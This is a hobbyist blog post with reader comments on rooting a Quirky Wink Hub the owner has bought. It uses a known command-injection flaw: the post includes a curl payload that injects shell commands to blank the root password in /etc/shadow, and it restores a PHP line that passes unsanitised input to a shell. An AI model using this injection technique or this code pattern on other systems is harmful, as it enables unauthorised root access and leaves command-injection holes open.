Rooting The Quirky Wink Hub

As you may know, the Quirky Wink Hub is an affordable Home Automation device containing the following radios:  WiFi, Bluetooth, ZigBee, Z-Wave, Lutron, and Kidde.  It operates using the Wink app and connecting through a cloud server.  It is sold at Home Depot and Amazon.

Well, that’s good but what if we want to take matters into our own hands?  The device is a nice little Freescale i.MX283 based Linux box that we can have some fun with, especially with all the radio support.

Luckily, the enterprising crew at GTVHacker has discovered a nice exploit that makes rooting this hardware quite easy: http://dc22.gtvhacker.com/index.php/Wink_Hub%E2%80%8B%E2%80%8B

This is briefly discussed at:  http://hackaday.com/2014/08/09/defcon-22-hack-all-the-things/

Unfortunately this is patched in the most recent update.  The set_dev_value.php file has been removed.  So be sure to do this before you have connected the hub to the internet.

But what about a how-to?

Let’s get to it:

Plug in your Quirky Wink Hub and connect to the default WiFi AP that it creates.

Using cURL or similar, send the following command to the lighttpd server to remove the root password:

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;cp /etc/shadow /etc/shadow.bak;sed -i 's/root:.*:\(.*:.*:.*:.*:::\)/root::\1/' /etc/shadow;cat /etc/shadow;"

We should be able to access the shell now through the UART using a 3.3V TTL adapter.

If we don’t have the hardware to do that, there is another option.  You can use the tftp command to bring over a replacement rsa key file for dropbear which runs on the device by default or use another cURL command to append your public rsa key to the /root/.ssh/authorized_keys file.  Then you can access the device through SSH.  Or you can create a new php file to preserve the shell command access through the web server.

Now that we have access to the device, we can notice that there is a web interface available by default at /devices.php.  This allows us to view and control the home automation devices linked to the hub.  However the control part does not work since a file has been removed.  We can restore that function by editing the /var/www/set_dev_value.php file as follows:

$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;

So we have a fully functional web interface to view and control the status of our connected devices.  We can use this as an API.

To add devices, we can do so using the aprontest binary which prints some nice help instructions when run with no arguments.

If we want to block the cloud connections and updates we can add the following entries to the hosts file:

127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com

Finally, we want to connect the hub as a client to our own WiFi network.  We can do so by POSTing the WiFi network information to the web server on the hub as follows:

curl "http://192.168.0.1/index.php" -d '{"ssid":"my_ssid","pass":"my_wifi_password"}'

As you can see the network parameters are just JSON encoded.

For some reason, these settings don’t seem to be saved to the database and persist through a reboot.  Possibly because we did not create a user account with a valid token.  So we can

cp /database/wpa_supplicant.conf /etc/

Then we can edit the /etc/init.d/S41wireless file to reflect the new location of wpa_supplicant.conf.

We can prevent these settings from being deleted if we have not created a wink account by doing:

touch /database/oauth

No, apparently the oauth file gets deleted if it is invalid so we need to edit /etc/init.d/S31platform to prevent it from deleting our wpa_supplicant.conf file.

Well, we should have a nice Quirky Wink Hub completely under our control now and ready to serve us faithfully without help from the cloud.

Advertisements

148 thoughts on “Rooting The Quirky Wink Hub

  1. Has anybody successfully updated to the latest version of the hub firmware? I downloaded the firmware from https://wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi and followed all the manual update instructions, made sure getty was still being enabled and dropbear starting, etc, via uart. However once I hit reboot after writing the firmware I saw it apply yet another image during the first boot up. All of a sudden the serial console wasn’t accepting input, ssh wouldn’t let me login, but luckily I had put a php page in the new image that had cmd execution enabled and I was able to open /etc/inittab and saw the getty line was now commented out after I had checked previous to the reboot and confirmed it was uncommented. While it was connecting to wifi fine from the update image and after the first boot, once I rebooted it again the light went solid pink with no wifi connection at all and all I have now is uart access. It’s not bricked since I still have uart control, but hell if I know what went wrong with the update. When it boots is keeps saying “ubifs does not exist!” or something along those lines when it tries to attach /dev/mtd3 in one of the startup scripts. Anybody have any insight into this one?

    Like

    • rofl nevermind I figured out what I did…when I used the php page to echo the getty line back in to /etc/inittab I musta typed > instead of >> and it cleared out the file. Still, the fact that the files were updated again during the first boot to attempt to kill root access is worrying. Has anybody else seen this?

      Like

  2. Cool, about to get started. Can anyone confirm that I would leave the 3.3V floating at the wink PCB side when I want to install a serial connection?

    For the pogoplug, I rigged a Nokia CA-42 cable (has 3.3V level converter in it) to a 3.5mm headphone plug and on the other side rigger the serial connection to the corresponding headphone jack pins. I’d like to re-use the cable for the wink and install a headphone jack wired up to the GND/Tx/Rx pins of the wink. Only issue is the headphone jack I chose was TRS instead of TRRS and only has three connection points instead of four. This will work if I can indeed leave 3.3V on the wink disconnected. Can anyone confirm?

    Like

  3. Is the processor powerful enough to run openHAB or homegenie? Seems it would be a great buy if you could. Otherwise my $20 is better spent buying a USB Zwave controller than messing with this.

    Like

  4. Hi, I was able to root the hub and put it on my home network. I can ssh into the hub as well. However, I was not able to add it to the wink android application. How am I supposed to control the hub now?

    Like

  5. What is the most recent version of f/w that can be exploited? Before discovering this site, I updated my Wink hubs, one to 00.56, the other to 00.55. Thx!

    Like

  6. Unfortunately I happened upon all of this after I had already upgraded to the latest firmware (0.56). Is there any way I can root or am I out of luck?

    Like

  7. Looks like a WM10134CT-ND vertical molex micro usb connector would fit nicely in J8.

    Has anyone been able to use something like imx_usb_loader to rescue an accidentially updated hub?

    Like

  8. anyone got zapped with the latest firmware and had it die? I currently have a new-in-box Wink and I was thinking of rooting it before bringing online (to the net). The latest firmware was zapped with an expired SSL cert and it got me thinking if I have an old version, will the expired cert block me from using the exploit (for rooting)?

    Like

    • I didn’t have any issue updating with the old cert. If you check XDA forums, someone attached the new cert in case of trouble.

      On Mon, Apr 20, 2015, 3:09 PM winkhubroot wrote:

      > Roland Gallinera commented: “anyone got zapped with the latest firmware > and had it die? I currently have a new-in-box Wink and I was thinking of > rooting it before bringing online (to the net). The latest firmware was > zapped with an expired SSL cert and it got me thinking if I have an” >

      Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s